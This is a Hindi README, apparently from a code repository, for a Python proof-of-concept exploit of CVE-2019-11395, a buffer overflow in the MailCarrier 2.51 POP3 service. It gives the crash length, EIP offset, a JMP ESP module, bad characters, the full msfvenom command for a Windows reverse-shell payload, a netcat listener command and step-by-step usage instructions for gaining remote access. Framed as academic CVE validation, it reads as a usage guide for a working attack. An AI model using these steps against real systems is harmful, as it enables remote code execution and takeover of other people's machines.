
CVE-2019-11395 के लिए Python एक्सप्लॉइट, MailCarrier 2.51 POP3 सेवा में एक बफर ओवरफ्लो। msfvenom के माध्यम से रिवर्स शेल पेलोड उत्पन्न करता है और Windows लक्ष्यों पर दूरस्थ कोड निष्पादन प्राप्त करता है।
CVE-2019-11395 भेद्यता MailCarrier 2.51 ईमेल एप्लिकेशन में बफर ओवरफ्लो भेद्यता का वर्णन करती है, जो दूरस्थ कोड निष्पादन की अनुमति देती है। यह भेद्यता SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, या POP3 RETR प्रक्रियाओं में होती है।
शैक्षणिक अध्ययन के दौरान, POP3 प्रक्रियाओं पर ध्यान केंद्रित किया गया था ताकि एक प्रूफ ऑफ कॉन्सेप्ट (PoC) बनाया जा सके। यह पहचाना गया कि एप्लिकेशन को 6000 बाइट्स भेजने से यह काम करना बंद कर देता है, जिससे बफर ओवरफ्लो भेद्यता का पता चलता है।
msf-pattern_create -l 6000 का उपयोग किया गया।msf-pattern_offset -q 6E47386E -l 6000 के साथ पहचाना गया, जिसके परिणामस्वरूप EIP ऑफ़सेट 5095 प्राप्त हुआ।expsrv.dll की पहचान की गई, जो JMP ESP के लिए उपयुक्त है।\x00\x0a\x0d की पहचान की गई।msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode के साथ।CVE-2019-11395.py कोड में संशोधन किया गया।nc -lnvp 4444 के साथ कनेक्शन खोला गया और शोषण (CVE-2019-11395.py) को निष्पादित किया गया ताकि पर्यावरण तक पहुंच प्राप्त हो सके और वर्णित CVE को मान्य किया जा सके।शोषण का उपयोग करने के लिए इन चरणों का पालन करें:
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode का उपयोग करके पेलोड उत्पन्न करें।msfvenom कमांड के आउटपुट को कॉपी करें।CVE-2019-11395.py कोड में shellcode वेरिएबल को msfvenom कमांड से प्राप्त आउटपुट से बदलने के लिए समायोजित करें।CVE-2019-11395.py) को निष्पादित करें ताकि पर्यावरण तक पहुंच प्राप्त हो सके और वर्णित CVE को मान्य किया जा सके।
मेरी प्रोफ़ाइल देखें LinkedIn पर